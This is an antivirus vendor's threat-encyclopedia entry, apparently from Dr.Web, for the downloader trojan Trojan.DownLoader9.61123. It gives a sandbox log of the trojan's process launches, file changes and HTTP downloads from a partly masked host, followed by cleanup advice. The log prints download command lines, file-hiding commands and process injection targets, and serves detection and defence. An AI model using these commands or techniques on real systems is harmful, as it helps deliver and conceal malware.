Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader9.61123

Добавлен в вирусную базу Dr.Web: 2013-08-05

Описание добавлено:

Техническая информация

Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\1.tmp\tasklist.exe' 1.1.1.1 -n 1 -w 125
  • '%TEMP%\1.tmp\tasklist.exe' /pid=3332
  • '%TEMP%\1.tmp\tasklist.exe' /pid=2768
  • '%TEMP%\afolder\uharc.exe' /pid=296
  • '%TEMP%\1.tmp\tasklist.exe' /pid=2940
  • '%TEMP%\1.tmp\BiscontiComputers-start.exe'
  • '%TEMP%\1.tmp\tasklist.exe' /FI "IMAGENAME eq BiscontiComputers-start.exe" /FO CSV
  • '%TEMP%\afolder\uharc.exe' x -t"%TEMP%\bisc" -y+ %TEMP%\afolder\curl.uha
  • '%TEMP%\1.tmp\tasklist.exe' /pid=3372
  • '%TEMP%\1.tmp\tasklist.exe' /pid=2848
Запускает на исполнение:
  • '<SYSTEM32>\find.exe' /pid=3836
  • '<SYSTEM32>\ping.exe' --progress-bar -o "%TEMP%\bisc\Piriform.uha" "http://www.bi#####icomputers.com/bisc_files/files/Piriform.uha"
  • '<SYSTEM32>\ping.exe' -s -o "%TEMP%\bisc\mbam-v.txt" "http://www.bi#####icomputers.com/bisc_files/files/mbam-v.txt"
  • '<SYSTEM32>\fc.exe' "bisc_files\mbam-v.txt" "%TEMP%\bisc\mbam-v.txt"
  • '<SYSTEM32>\find.exe' /pid=3864
  • '<SYSTEM32>\find.exe' con: lines=10
  • '<SYSTEM32>\ping.exe' con: lines=10
  • '<SYSTEM32>\ping.exe' /FI "IMAGENAME eq BiscontiComputers-start.exe" /FO CSV
  • '<SYSTEM32>\ping.exe' /pid=2992
  • '<SYSTEM32>\fc.exe' "bisc_files\ccleaner-v.txt" "%TEMP%\bisc\ccleaner-v.txt"
  • '<SYSTEM32>\find.exe' /pid=2792
  • '<SYSTEM32>\ping.exe' --progress-bar -o "%TEMP%\bisc\GlaryRegistryRepair.uha" "http://www.bi#####icomputers.com/bisc_files/files/GlaryRegistryRepair.uha"
  • '<SYSTEM32>\attrib.exe' /pid=3900
  • '<SYSTEM32>\attrib.exe' /pid=1144
  • '<SYSTEM32>\ping.exe' /pid=2656
  • '<SYSTEM32>\attrib.exe' +h dummy.file
  • '<SYSTEM32>\fc.exe' "bisc_files\glary-v.txt" "%TEMP%\bisc\glary-v.txt"
  • '<SYSTEM32>\find.exe' /pid=1632
  • '<SYSTEM32>\ping.exe' --progress-bar -o "%TEMP%\bisc\Malwarebytes.uha" "http://www.bi#####icomputers.com/bisc_files/files/Malwarebytes.uha"
  • '<SYSTEM32>\find.exe' /pid=1400
  • '<SYSTEM32>\ping.exe' /pid=2492
  • '<SYSTEM32>\ping.exe' -s -o "%TEMP%\bisc\glary-v.txt" "http://www.bi#####icomputers.com/bisc_files/files/glary-v.txt"
  • '<SYSTEM32>\ping.exe' -n 1 www.bi#####icomputers.com
  • '<SYSTEM32>\ping.exe' 1.1.1.1 -n 1 -w 125
  • '<SYSTEM32>\find.exe' "Reply from "
  • '<SYSTEM32>\find.exe' /pid=3124
  • '<SYSTEM32>\ping.exe' /pid=3072
  • '<SYSTEM32>\attrib.exe' +h %TEMP%\ztmp
  • '<SYSTEM32>\attrib.exe' +h "<Текущая директория>\\bisc_files"
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\BiscontiComputers.bat" <Текущая директория>\"
  • '<SYSTEM32>\find.exe' "BiscontiComputers-start.exe" %TEMP%\running2.log
  • '<SYSTEM32>\find.exe' "BiscontiComputers-start.exe" %TEMP%\running.log
  • '<SYSTEM32>\ping.exe' 1.1.1.1 -n 1 -w 4000
  • '<SYSTEM32>\ping.exe' /pid=2620
  • '<SYSTEM32>\ping.exe' /pid=2800
  • '<SYSTEM32>\fc.exe' "<Текущая директория>\bisc_files\aiov.txt" "%TEMP%\bisc\aiov.txt"
  • '<SYSTEM32>\ping.exe' /pid=1144
  • '<SYSTEM32>\ping.exe' "BiscontiComputers-start.exe" %TEMP%\running.log
  • '<SYSTEM32>\ping.exe' /pid=3448
  • '<SYSTEM32>\mode.com' con: lines=10
  • '<SYSTEM32>\ping.exe' /pid=3260
  • '<SYSTEM32>\find.exe' 1.1.1.1 -n 1 -w 125
  • '<SYSTEM32>\find.exe' /pid=3516
  • '<SYSTEM32>\ping.exe' x -t"%TEMP%\bisc" -y+ %TEMP%\afolder\curl.uha
Внедряет код в
следующие системные процессы:
  • <SYSTEM32>\ping.exe
  • <SYSTEM32>\find.exe
  • <SYSTEM32>\cmd.exe
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\bisc\dwn_util.bat
  • %TEMP%\bisc\check_inet.bat
  • %TEMP%\bisc\Wi-Fi-TechCenter.xml
  • %TEMP%\bisc\libcurl.dll
  • %TEMP%\bisc\libssl32.dll
  • %TEMP%\bisc\libeay32.dll
  • %TEMP%\bisc\replace.vbs
  • %TEMP%\waiting.bat
  • %TEMP%\ztmp\tmp7409.exe
  • %TEMP%\ztmp\tmp1115.bat
  • %TEMP%\bisc\tasklist.exe
  • %TEMP%\bisc\uharc.exe
  • %TEMP%\myfiles.txt
  • %TEMP%\bisc\curl.exe
  • %TEMP%\bisc\Malwarebytes.uha
  • %TEMP%\bisc\mbam-v.txt
  • %TEMP%\bisc\Piriform.uha
  • <Текущая директория>\BiscontiComputers.exe
  • %TEMP%\bisc\GlaryRegistryRepair.uha
  • %TEMP%\bisc\glary-v.txt
  • %TEMP%\bisc\ccleaner-v.txt
  • %TEMP%\bisc\loaded.txt
  • %TEMP%\bisc\aiov.txt
  • %TEMP%\bisc\bisc_setup-tmp.txt
  • %TEMP%\bisc\BiscontiComputers.exe
  • <Служебный элемент>
  • %TEMP%\end_prog.txt
  • %TEMP%\afolder\replace.vbs
  • %TEMP%\afolder\createsrp.vbs
  • %TEMP%\afolder\check_inet.bat
  • %TEMP%\afolder\prog_list.exe
  • %TEMP%\afolder\no_dup.bat
  • %TEMP%\afolder\curl.uha
  • %TEMP%\afolder\AutoFix.exe
  • %TEMP%\1.tmp\tasklist.exe
  • %TEMP%\1.tmp\BiscontiComputers-start.exe
  • %TEMP%\1.tmp\BiscontiComputers.bat
  • %TEMP%\running.log
  • %TEMP%\tmp_dir.txt
  • %TEMP%\aio_dir.bat
  • %TEMP%\afolder\resetdma.vbs
  • %TEMP%\afolder\blat.exe
  • %TEMP%\afolder\blat.dll
  • %TEMP%\afolder\Wi-Fi-TechCenter.xml
  • %TEMP%\afolder\TimeMath.exe
  • %TEMP%\afolder\blatdll.h
  • %TEMP%\afolder\blat.lib
  • %TEMP%\afolder\regjump.exe
  • %TEMP%\afolder\SetWallpaper.exe
  • %TEMP%\afolder\sendmail.exe
  • %TEMP%\afolder\say.exe
  • %TEMP%\afolder\waiting.bat
  • %TEMP%\afolder\dwn_util.bat
  • %TEMP%\afolder\uharc.exe
Удаляет следующие файлы:
  • %TEMP%\1.tmp\BiscontiComputers-start.exe
  • %TEMP%\1.tmp\tasklist.exe
  • %TEMP%\1.tmp\BiscontiComputers.bat
  • %TEMP%\aio_dir.bat
  • %TEMP%\tmp_dir.txt
  • %TEMP%\bisc\bisc_setup-tmp.txt
Сетевая активность:
Подключается к:
  • 'www.bi#####icomputers.com':80
TCP:
Запросы HTTP GET:
  • www.bi#####icomputers.com/bisc_files/files/Malwarebytes.uha
  • www.bi#####icomputers.com/bisc_files/files/mbam-v.txt
  • www.bi#####icomputers.com/bisc_files/files/GlaryRegistryRepair.uha
  • www.bi#####icomputers.com/bisc_files/files/glary-v.txt
  • www.bi#####icomputers.com/bisc_files/BiscontiComputers_MZ?.e##
  • www.bi#####icomputers.com/bisc_files/aiov.txt
  • www.bi#####icomputers.com/bisc_files/files/Piriform.uha
  • www.bi#####icomputers.com/bisc_files/files/ccleaner-v.txt
UDP:
  • DNS ASK www.bi#####icomputers.com

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке